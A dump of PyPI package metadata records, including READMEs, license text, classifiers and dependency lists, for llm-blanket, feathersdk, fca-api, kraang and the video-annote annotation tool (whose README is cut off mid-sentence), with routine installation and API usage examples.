**[examples/config_and_url_override.py](examples/config_and_url_override.py)** – `LLMConfig`, `base_urls`, `base_url`, and explicit `provider`. Run from the repo root (set the appropriate API key first): ```bash OPENAI_API_KEY=sk-... python examples/quickstart.py ``` ## Quick start ```python from llm_blanket import get_llm, Message # Provider inferred from model name llm = get_llm("gpt-4o") # Option 1: system and user as named arguments resp = llm.invoke(system="You are helpful.", user="Hello!") print(resp.content) # Option 2: messages list (Message objects or OpenAI-style dicts) resp = llm.invoke([Message("user", "Hi")]) resp = llm([{"role": "user", "content": "Hi"}]) # Option 3: common parameters (temperature, max_tokens, etc.) 
are passed through to the provider resp = llm.invoke(user="Hello!", temperature=0.7, max_tokens=256) # Streaming: same signature as invoke(), yields StreamChunk (content delta, optional finish_reason) for chunk in llm.invoke_stream(user="Hello!", temperature=0.7): print(chunk.content, end="", flush=True) print() ``` ## Streaming Use `invoke_stream()` with the same arguments as `invoke()`. It yields `StreamChunk` objects (`.content` is the text delta; `.finish_reason` is set on the final chunk when the provider supplies it): ```python from llm_blanket import get_llm llm = get_llm("gpt-4o-mini") for chunk in llm.invoke_stream(system="You are concise.", user="Count to 5."): print(chunk.content, end="", flush=True) if chunk.finish_reason: print(f"\n[Done: {chunk.finish_reason}]") ``` Streaming is supported for OpenAI (and OpenAI-compatible), Anthropic, and Gemini. ## Configuration ### API keys By default, API keys are read from the environment. Use standard names so you can reuse `.env` or shell exports: | Provider | Environment variable | |----------|----------------------| | OpenAI | `OPENAI_API_KEY` | | Anthropic| `ANTHROPIC_API_KEY` | | Gemini | `GOOGLE_API_KEY` | | xAI | `XAI_API_KEY` | | Groq | `GROQ_API_KEY` | | Custom | `OPENAI_API_KEY` (or pass explicitly) | Override in code: ```python from llm_blanket import get_llm, LLMConfig config = LLMConfig(api_key="sk-...") llm = get_llm("gpt-4o", config=config) # Or one-off llm = get_llm("gpt-4o", api_key="sk-...") ``` ### Base URL and URL mapping Override the base URL for a given client (e.g. custom or proxy): ```python # Single override for this client llm = get_llm("gpt-4o", base_url="https://my-gateway.com/v1") # Or via config with a mapping (e.g. 
per provider or per model) config = LLMConfig( base_urls={ "openai": "https://my-openai-proxy.com/v1", "gpt-4o": "https://special-endpoint.com/v1", } ) llm = get_llm("gpt-4o", config=config) ``` Resolution order: `base_url` (direct) > `base_urls[model]` > `base_urls[provider]` > default URL for that provider. ### Forcing provider Use when the model name doesn’t indicate the provider (e.g. Groq’s `llama-3-70b-8192`): ```python llm = get_llm("llama-3-70b-8192", provider="groq") ``` ## Supported models / providers | Provider | Inferred from | Notes | |-----------|--------------------|--------------------------| | OpenAI | `gpt-*`, `o1-*`, `o3-*` | Default base: `https://api.openai.com/v1` | | Anthropic | `claude-*` | Uses Anthropic Messages API | | Gemini | `gemini-*` | Uses Google GenAI SDK | | xAI | `grok*`, `grok-*` | OpenAI-compatible | | Groq | Set `provider="groq"` | Models like `llama-3-70b-8192`; OpenAI-compatible | | Custom | Set `provider="custom"` and `base_url` | Any OpenAI-compatible endpoint | ## Extensibility - **Unified response**: `invoke()` returns an `LLMResponse` with `content`, `model`, `usage`, `finish_reason`, and optional `raw` (provider-specific object) and `tool_calls`. - **Provider-specific options**: Pass extra kwargs to `invoke()` (e.g. `temperature`, `max_tokens`); they are forwarded to the underlying API. Use `LLMConfig(extra={...})` for client-level options. - **Custom backends**: Implement `BaseLLM` (see `llm_blanket.base`) and register or construct your backend explicitly; the factory is focused on the built-in providers. ## Example: multiple providers and URL overrides ```python from llm_blanket import get_llm, LLMConfig, Message # Shared URL mapping (e.g. 
from app config) config = LLMConfig( base_urls={ "openai": "https://my-proxy.com/openai/v1", "groq": "https://api.groq.com/openai/v1", } ) openai_llm = get_llm("gpt-4o-mini", config=config) groq_llm = get_llm("llama-3-70b-8192", config=config, provider="groq") for llm in [openai_llm, groq_llm]: r = llm.invoke([Message("user", "Say hi in one word.")]) print(f"{llm.provider}: {r.content}") ``` ## License MIT
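The base-URL resolution order documented above can be restated as a small standalone function. This is a simplified sketch of the documented precedence, not the library's internal code; `DEFAULT_URLS` is a hypothetical stand-in for the built-in provider defaults:

``` python
# Sketch of the documented precedence:
# base_url (direct) > base_urls[model] > base_urls[provider] > provider default.
from typing import Optional

# Hypothetical stand-in for the library's built-in defaults.
DEFAULT_URLS = {"openai": "https://api.openai.com/v1"}

def resolve_base_url(model: str, provider: str,
                     base_url: Optional[str] = None,
                     base_urls: Optional[dict] = None) -> str:
    base_urls = base_urls or {}
    if base_url:                   # 1. direct override wins
        return base_url
    if model in base_urls:         # 2. per-model mapping
        return base_urls[model]
    if provider in base_urls:      # 3. per-provider mapping
        return base_urls[provider]
    return DEFAULT_URLS[provider]  # 4. default URL for the provider

print(resolve_base_url("gpt-4o", "openai",
                       base_urls={"openai": "https://my-openai-proxy.com/v1",
                                  "gpt-4o": "https://special-endpoint.com/v1"}))
# -> https://special-endpoint.com/v1  (per-model beats per-provider)
```

Keeping the per-model key ahead of the per-provider key lets one model be routed to a special endpoint while the rest of the provider's models go through the shared proxy.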
text/markdown
Yoseph Berhanu Alebachew
null
null
null
MIT
llm, openai, anthropic, gemini, groq, xai, api
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: Scientific/Engi...
[]
null
null
>=3.10
[]
[]
[]
[ "httpx>=0.25", "openai>=1.0; extra == \"openai\"", "anthropic>=0.39; extra == \"anthropic\"", "google-genai>=1.0; extra == \"gemini\"", "llm-blanket[anthropic,gemini,openai]; extra == \"all\"" ]
[]
[]
[]
[ "Repository, https://github.com/yosephberhanu/llm-blanket" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:08:54.625469
llm_blanket-0.1.1.tar.gz
12,363
db/36/dbd2b9f3a742369d335671338a04a328b95717423852a8a9b47b7f91450b/llm_blanket-0.1.1.tar.gz
source
sdist
null
false
2c254737ec837d255b346fe8e8087b0d
c52677a1277de923e60c8b6b9e7b96a2707ea4fdfc160532b8f0a9fe911eabe0
db36dbd2b9f3a742369d335671338a04a328b95717423852a8a9b47b7f91450b
null
[]
228
2.4
feathersdk
0.0.11
Feather Robotics Python SDK Library
# Feather Python SDK Library [![License: Apache 2.0](https://img.shields.io/badge/license-Apache%20License%202.0-blue)](https://www.apache.org/licenses/LICENSE-2.0) [![PyPI](https://img.shields.io/pypi/v/feathersdk)](https://pypi.org/project/feathersdk/) [![Supported Versions](https://img.shields.io/pypi/pyversions/feathersdk.svg)](https://pypi.org/project/feathersdk/) ## Installation You can install with: ```bash pip install feathersdk ```
text/markdown
Feather Robotics Inc.
null
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS Copyright 2025 Feather Robotics Inc. 
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14", "Programming...
[]
null
null
>=3.9
[]
[]
[]
[ "canopen", "pyserial", "typing_extensions", "filelock", "numpy>=1.10", "psutil", "smbus2", "hydra-core", "pandas", "scipy", "pyarrow" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:08:51.202832
feathersdk-0.0.11.tar.gz
186,298
02/77/bb5decdd0026d044703e40817c8e74363caabff9509e644c858757bc2724/feathersdk-0.0.11.tar.gz
source
sdist
null
false
883a0389ebfce3ea89788656854dec93
fdc501016b4d2d4bb276f7e70fc16aa286fed06e0f84af13e048cf1a4f4b5dca
0277bb5decdd0026d044703e40817c8e74363caabff9509e644c858757bc2724
null
[ "LICENSE" ]
224
2.4
fca-api
1.0.3
Python client library for the UK Financial Conduct Authority (FCA) Financial Services Register RESTful API
# fca-api [![CI](https://github.com/release-art/fca-api/actions/workflows/ci.yml/badge.svg)](https://github.com/release-art/fca-api/actions/workflows/ci.yml) [![CodeQL](https://github.com/release-art/fca-api/actions/workflows/codeql.yml/badge.svg)](https://github.com/release-art/fca-api/actions/workflows/codeql.yml) [![License: MPL 2.0](https://img.shields.io/badge/License-MPL_2.0-brightgreen.svg)](https://opensource.org/licenses/MPL-2.0) [![PyPI version](https://img.shields.io/pypi/v/fca-api?logo=python&color=41bb13)](https://pypi.org/project/fca-api) A comprehensive async Python client library for the UK Financial Conduct Authority's [Financial Services Register](https://register.fca.org.uk/s/) [RESTful API](https://register.fca.org.uk/Developer/s/). ## Overview This package provides both high-level and low-level asynchronous interfaces to interact with the FCA's Financial Services Register API. It offers type-safe, well-documented access to query information about: - **Financial firms** and their comprehensive details - **Individual professionals** in the financial services industry - **Investment funds** and collective investment schemes - **Regulatory permissions** and restrictions - **Disciplinary actions** and enforcement history - **Regulated markets** and trading venues > **Note:** This is an async fork of the [`financial-services-register-api`](https://github.com/sr-murthy/financial-services-register-api) package, completely rewritten for modern async/await patterns with comprehensive type safety and documentation. 
## Requirements - Python 3.11 or higher - httpx library for async HTTP requests - pydantic for data validation and parsing ## Installation Install from PyPI using pip: ```bash pip install fca-api ``` ## Quick Start Here's a simple example to get you started with the high-level client: ```python import asyncio import fca_api async def main(): # Using async context manager (recommended) async with fca_api.async_api.Client( credentials=("your.email@example.com", "your_api_key") ) as client: # Search for firms by name firms = await client.search_frn("Barclays") print(f"Found {len(firms)} firms matching 'Barclays'") # Iterate through paginated results async for firm in firms: print(f"• {firm.name} (FRN: {firm.frn}) - Status: {firm.status}") # Get detailed information about a specific firm if len(firms) > 0: firm_details = await client.get_firm(firms[0].frn) print(f"\nFirm Details:") print(f"Name: {firm_details.name}") print(f"Status: {firm_details.status}") print(f"Effective Date: {firm_details.effective_date}") if __name__ == "__main__": asyncio.run(main()) ``` ## Architecture The library provides two complementary interfaces: ### High-Level Client (`fca_api.async_api.Client`) - **Type-safe**: All responses are validated with Pydantic models - **Pagination**: Automatic lazy-loading pagination with `async for` support - **Convenient**: Intuitive methods like `search_frn()`, `get_firm()`, etc. 
- **Error handling**: Meaningful exceptions and validation ### Raw Client (`fca_api.raw_api.RawClient`) - **Direct access**: Minimal abstraction over HTTP API - **Flexible**: For advanced use cases and custom processing - **Performance**: Lower overhead for bulk operations - **Testing**: Ideal for debugging and API exploration ## Key Features - **Asynchronous Operations**: Built with async/await for efficient concurrent requests - **Comprehensive Documentation**: Extensive docstrings and examples for all methods - **Type Safety**: Full type annotation support with Pydantic validation - **Smart Pagination**: Lazy-loading pagination with automatic page fetching - **Robust Error Handling**: Meaningful exceptions with detailed context - **High Performance**: Optimized for both single queries and bulk operations - **Well Tested**: Comprehensive test suite with response caching - **Extensible**: Clean architecture for custom extensions ## Usage Examples ### Searching and Pagination ```python import fca_api async with fca_api.async_api.Client(credentials=("email", "key")) as client: # Search returns a lazy-loading paginated list results = await client.search_frn("revolution") # Check total results without loading all pages print(f"Total results: {len(results)}") # Access specific items by index (loads pages as needed) first_result = results[0] # Iterate through all results efficiently async for firm in results: print(f"{firm.name} - {firm.status}") # Or load all pages at once for bulk processing await results.fetch_all_pages() ``` ### Firm Information ```python # Get comprehensive firm details firm = await client.get_firm("123456") # Using FRN print(f"Firm: {firm.name}") print(f"Status: {firm.status}") # Get related information addresses = await client.get_firm_addresses("123456") permissions = await client.get_firm_permissions("123456") individuals = await client.get_firm_individuals("123456") async for address in addresses: print(f"Address: {', 
'.join(address.address_lines)}") ``` ### Individual and Fund Searches ```python # Search for individuals individuals = await client.search_irn("John Smith") async for person in individuals: print(f"{person.name} (IRN: {person.irn})") # Search for funds/products funds = await client.search_prn("Vanguard") async for fund in funds: print(f"{fund.name} (PRN: {fund.prn})") ``` ### Error Handling ```python import fca_api.exc try: firm = await client.get_firm("invalid_frn") except fca_api.exc.FcaRequestError as e: print(f"API request failed: {e}") except fca_api.exc.FcaBaseError as e: print(f"General API error: {e}") ``` ### Rate Limiting ```python from asyncio_throttle import Throttler # Limit to 10 requests per second throttler = Throttler(rate_limit=10) async with fca_api.async_api.Client( credentials=("email", "key"), api_limiter=throttler ) as client: # All requests will be automatically rate limited results = await client.search_frn("test") ``` ## Raw Client Usage For advanced use cases or when you need direct API access: ```python import fca_api.raw client = fca_api.raw_api.RawClient( credentials=("email", "key") ) # Direct API calls return raw responses response = await client.search_frn("Barclays", page=0) if response.fca_api_status == "Success": for item in response.data: print(f"Raw data: {item}") print(f"Pagination info: {response.result_info}") ``` ## Documentation The library includes comprehensive documentation: - **In-code documentation**: All classes and methods have detailed docstrings - **Type hints**: Complete type information for IDE support - **Examples**: Practical examples in every docstring - **API reference**: Auto-generated from docstrings (Sphinx-compatible) Access documentation in your IDE or Python REPL: ```python import fca_api help(fca_api.async_api.Client) # High-level client help(fca_api.async_api.Client.search_frn) # Specific method help(fca_api.types.firm.FirmDetails) # Response types ``` For complete API reference and advanced usage, 
visit the [full documentation](https://docs.release.art/fca-api/). ## Contributing Contributions are welcome! Please see [contributing guidelines](https://docs.release.art/fca-api/sources/contributing.html) on how to contribute to this project. ## License This project is licensed under the Mozilla Public License 2.0. See the [LICENSE](LICENSE) file for details. ## Support If you encounter any issues or have questions, please: 1. Check the comprehensive in-code documentation with `help()` 2. Review the [complete documentation](https://docs.release.art/fca-api/) 3. Search existing [GitHub issues](https://github.com/release-art/fca-api/issues) 4. Create a new issue if your problem hasn't been addressed ## API Authentication To use this library, you need API credentials from the FCA Developer Portal: 1. Visit [FCA Developer Portal](https://register.fca.org.uk/Developer/s/) 2. Register for an account 3. Generate API credentials (email and API key) 4. Use these credentials when initializing the client **Note**: Keep your API credentials secure and never commit them to version control.
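Because every client method is a coroutine, lookups compose naturally with `asyncio.gather` for concurrency. A self-contained sketch with a stubbed client (the real `fca_api.async_api.Client` requires credentials and network access; `StubClient` here is a hypothetical stand-in):

```python
import asyncio

class StubClient:
    # Hypothetical stand-in for fca_api.async_api.Client; the real
    # get_firm() performs an authenticated HTTP request.
    async def get_firm(self, frn: str) -> dict:
        await asyncio.sleep(0)  # simulate I/O
        return {"frn": frn, "name": f"Firm {frn}"}

async def main() -> list:
    client = StubClient()
    # Fetch several firms concurrently instead of awaiting one at a time.
    return await asyncio.gather(*(client.get_firm(f) for f in ["100", "200"]))

firms = asyncio.run(main())
print(len(firms))  # → 2
```

With the real client, the same `gather` pattern applies inside the `async with` block; rate limiting (see above) keeps concurrent requests within the API's limits.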
text/markdown
null
"I. Orlovs" <ilja@release.art>, "S. R. Murthy" <s.murthy@tutanota.com>
null
"I. Orlovs" <ilja@release.art>
null
financial conduct authority, FCA, financial data, financial regulation, financial services register, financial services, prudential regulation authority, regulated markets, restful api, uk, united kingdom
[ "Environment :: Console", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Development Status :: 4 - Beta", "Operating System :: POSIX :: Linux", "Operating System :: MacOS", "Operati...
[]
null
null
>=3.11
[]
[]
[]
[ "httpx>=0.28.1", "pydantic>=2.12.5" ]
[]
[]
[]
[ "Homepage, https://docs.release.art/fca-api/", "Documentation, https://docs.release.art/fca-api/", "Repository, https://github.com/release-art/fca-api/" ]
pdm/2.26.6 CPython/3.13.11 Linux/6.11.0-1018-azure
2026-02-19T22:07:39.469799
fca_api-1.0.3.tar.gz
46,075
8f/f6/d23da981bcddc8fabb25a491a744b5b1c33316bbfc0c3a20885f1c19f804/fca_api-1.0.3.tar.gz
source
sdist
null
false
716e65a60428d017b24d8ab445384f5b
ee6b1ab3310acaf53a76d0d5f7bfcadd763fb0ed1a3aef2efa3ea18861170bdf
8ff6d23da981bcddc8fabb25a491a744b5b1c33316bbfc0c3a20885f1c19f804
null
[]
211
2.4
kraang
0.2.1
A second brain for humans and their agents — MCP server backed by SQLite FTS5.
<table> <tr> <td><img src="assets/kraang.jpeg" alt="Kraang" width="350"></td> <td><h1>Kraang</h1><b>A second brain for you and your agents.</b></td> </tr> </table> Kraang is an MCP (Model Context Protocol) server that gives AI assistants persistent memory and session indexing, backed by SQLite with FTS5 full-text search. It stores knowledge notes, indexes conversation transcripts, and surfaces what matters via search. ## Why? AI assistants forget everything between sessions. Kraang gives them persistent memory — decisions, debugging breakthroughs, patterns — so your next conversation picks up where the last one left off. ## Quick Start The fastest way to get started is with `kraang init`: ```bash uvx kraang init # ephemeral — downloads on each run uv tool install kraang # persistent — install once, use everywhere kraang init ``` This creates a `.kraang/` directory, initializes the database, configures `.mcp.json`, sets up a `SessionEnd` hook for automatic session indexing, creates `.claude/rules/kraang.md` for proactive agent behavior, and indexes any existing sessions. ### Manual Configuration Add to your MCP client configuration (e.g. Claude Code, Claude Desktop): ```json { "mcpServers": { "kraang": { "command": "uvx", "args": ["kraang", "serve"], "env": { "KRAANG_DB_PATH": ".kraang/kraang.db" } } } } ``` ## MCP Tools | Tool | Description | |------|-------------| | `remember` | Save knowledge to the brain. If a note with the same title exists, it updates in place. | | `recall` | Search notes and indexed sessions. Supports scoping to `"notes"`, `"sessions"`, or `"all"`. | | `read_session` | Load a full conversation transcript by session ID (use `recall` to find sessions first). | | `forget` | Downweight or hide a note by adjusting its relevance score (0.0 = hidden, 1.0 = full). | | `status` | Get a knowledge base overview: note/session counts, recent activity, top tags. 
| ## CLI Commands | Command | Description | |---------|-------------| | `kraang init` | Set up kraang for the current project (database, config, hooks, initial index). | | `kraang serve` | Run the MCP server over stdio (invoked by Claude Code). | | `kraang index` | Index or re-index conversation sessions for the project. | | `kraang sessions` | List recent conversation sessions. | | `kraang session <id>` | View a session transcript in detail. | | `kraang search <query>` | Search notes and sessions from the terminal. | | `kraang notes` | List notes in the knowledge base. | | `kraang status` | Show knowledge base health and statistics. | ## Architecture Kraang uses a layered architecture: 1. **Models** (`models.py`) -- Pydantic schemas for notes, sessions, and search results. 2. **Store** (`store.py`) -- SQLite backend with FTS5 full-text search and BM25 ranking. 3. **Search** (`search.py`) -- Query parsing and FTS5 expression building. 4. **Indexer** (`indexer.py`) -- Reads Claude Code JSONL transcripts and indexes sessions. 5. **Server** (`server.py`) -- MCP server exposing 5 tools over stdio. 6. **CLI** (`cli.py`) -- Typer CLI for init, serve, index, and local queries. 7. **Formatter** (`formatter.py`) -- Markdown formatting for tool and CLI output. 8. **Display** (`display.py`) -- Rich console rendering for CLI commands. 9. **Config** (`config.py`) -- Project root detection and database path resolution. ## Development ```bash git clone https://github.com/johnnygreco/kraang.git && cd kraang uv sync --extra dev make install-hooks # install pre-commit hooks (run once) make test make lint ``` Pre-commit hooks run automatically before each commit (ruff format, ruff check --fix, ty). 
Run manually: ```bash uv run pre-commit run --all-files ``` Run the full check suite: ```bash make coverage # tests + coverage report make format # auto-format with ruff ``` ## Troubleshooting | Problem | Fix | |---------|-----| | Kraang tools not showing up in Claude Code | Restart Claude Code after running `kraang init` | | Sessions not being indexed automatically | Check that `.claude/settings.json` has the `SessionEnd` hook | | Search returns nothing | Run `kraang status` to check counts, then `kraang index` to re-index | | Need a fresh start | Delete `.kraang/` and re-run `kraang init` | ## License Apache 2.0
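The Store layer's FTS5 + BM25 approach described under Architecture can be sketched with the standard-library `sqlite3` module (an illustrative schema, not kraang's actual one; requires an SQLite build with FTS5, which ships with most CPython distributions):

```python
import sqlite3

con = sqlite3.connect(":memory:")
# A minimal full-text index; kraang's real schema has more columns.
con.execute("CREATE VIRTUAL TABLE notes USING fts5(title, body)")
con.executemany("INSERT INTO notes VALUES (?, ?)", [
    ("debugging breakthrough", "fixed the race by adding a lock"),
    ("design decision", "chose sqlite fts5 over a vector store"),
])
# bm25() returns a rank where lower (more negative) means a better
# match, so ORDER BY ascending puts the best hit first.
rows = con.execute(
    "SELECT title, bm25(notes) FROM notes WHERE notes MATCH ? ORDER BY bm25(notes)",
    ("sqlite",),
).fetchall()
print(rows[0][0])  # → design decision
```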
text/markdown
Johnny Greco
null
null
null
null
fts5, knowledge-management, mcp, second-brain, sqlite
[ "Development Status :: 3 - Alpha", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12" ]
[]
null
null
>=3.10
[]
[]
[]
[ "aiosqlite>=0.20.0", "mcp<2,>=1.2.0", "pydantic>=2.0", "rich>=13.0", "typer>=0.12", "coverage>=7.0; extra == \"dev\"", "pre-commit>=3.0; extra == \"dev\"", "pytest-asyncio>=0.23; extra == \"dev\"", "pytest>=8.0; extra == \"dev\"", "ruff>=0.4; extra == \"dev\"", "ty>=0.0.1a7; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.2
2026-02-19T22:07:21.219817
kraang-0.2.1.tar.gz
148,131
67/47/e72d2078e64e3a02fee47024008a82c83ac14256d0fb08fc935ad89a8e8f/kraang-0.2.1.tar.gz
source
sdist
null
false
85a9a51702c91456a0994cd5fbbbf68e
bc2137c83c6fee616c10aab3b312777e6f27d44e6e662d0d9bebcaaca39008a2
6747e72d2078e64e3a02fee47024008a82c83ac14256d0fb08fc935ad89a8e8f
Apache-2.0
[ "LICENSE" ]
226
2.4
video-annote
0.1.1
video-annote is a lightweight multi-video annotation tool (PyQt5) for labeling time ranges (“labels”) while reviewing one or more videos.
# video-annote **Minimum Python:** `>=3.10` **video-annote** is a lightweight **multi-video annotation tool** (PyQt5) for labeling time ranges (“labels”) while reviewing one or more videos. You can: - Create/import sessions that contain multiple videos (local files or URLs) - Choose a **Time Source** (master timeline) and an **Audio Source** - Play/pause/restart and scrub safely - Mark **start/end** for labels and save annotations - Review and edit annotations via a **timeline** and a **table** - Autosave session state as you work --- ## Screenshot ![Video-Annote screenshot](docs/screenshot.png) --- ## Requirements - **Python >= 3.10** - **PyQt5** - **ffmpeg + ffprobe** ### Why ffmpeg/ffprobe? `video-annote` uses `ffmpeg/ffprobe` for: - importing URL-based videos (including `.m3u8`) - reading duration/FPS reliably --- ## Install ffmpeg + ffprobe Pick **one** method below. ### Option A: Conda If you plan to use Conda for Python, install ffmpeg into the same environment: ```bash conda install -c conda-forge ffmpeg -y ``` ### Option B: macOS (Homebrew) ```bash brew install ffmpeg ``` ### Option C: Ubuntu / Debian ```bash sudo apt-get update sudo apt-get install -y ffmpeg ``` ### Option D: Windows - Install ffmpeg (includes ffprobe) and add it to your **PATH**. After installing, verify: ```bash ffmpeg -version ffprobe -version ``` --- ## Recommended: Conda environment setup This is the most reproducible setup (and the easiest way to ensure ffmpeg/ffprobe are available). ### 1) Create and activate an environment ```bash conda create -n video-annote python=3.10 -y conda activate video-annote ``` ### 2) Install ffmpeg (inside the env) ```bash conda install -c conda-forge ffmpeg -y ``` > From here on, **run the remaining install/run steps inside this activated conda environment**. --- ## Install & run Choose one of the following approaches. 
### A) Install from PyPI (pip) ```bash pip install video-annote python -m video_annote ``` ### B) Using uv (great for development) ```bash git clone https://github.com/Surya-Rayala/Video-Annote.git cd Video-Annote uv sync uv run python -m video_annote ``` Notes: - If you use **uv**, you can still use the system/conda-installed ffmpeg as long as it’s on PATH. - If you created a **conda env**, make sure it’s activated before running uv commands so the env’s ffmpeg is used. --- ## How to use ### 1) Select a Data Root Click **Select Root** and choose a folder where sessions will be stored. ### 2) Create or import a session - **Create New Session** - Enter a session label (example: `session_001`) - Add videos: - **Local file…** - **URL…** (downloadable URL or `.m3u8` — requires ffmpeg) - **Import Existing Session** - Loads an already-saved session from the Data Root ### 3) Choose which videos are visible Use **Selected videos** (multi-select) to choose which videos appear in the grid. ### 4) Pick Time Source and Audio Source - **Time Source** = master timeline used for the slider and annotation timestamps - **Audio Source** = which video provides sound > Other videos are kept aligned to the Time Source during playback when possible. > If a video is shorter than the current Time Source position, its cell may show black. ### 5) Playback and scrubbing - **Play / Pause / Restart** - Drag the timeline slider to seek - Play is disabled at the end of the Time Source (use Restart) > **Note on playback 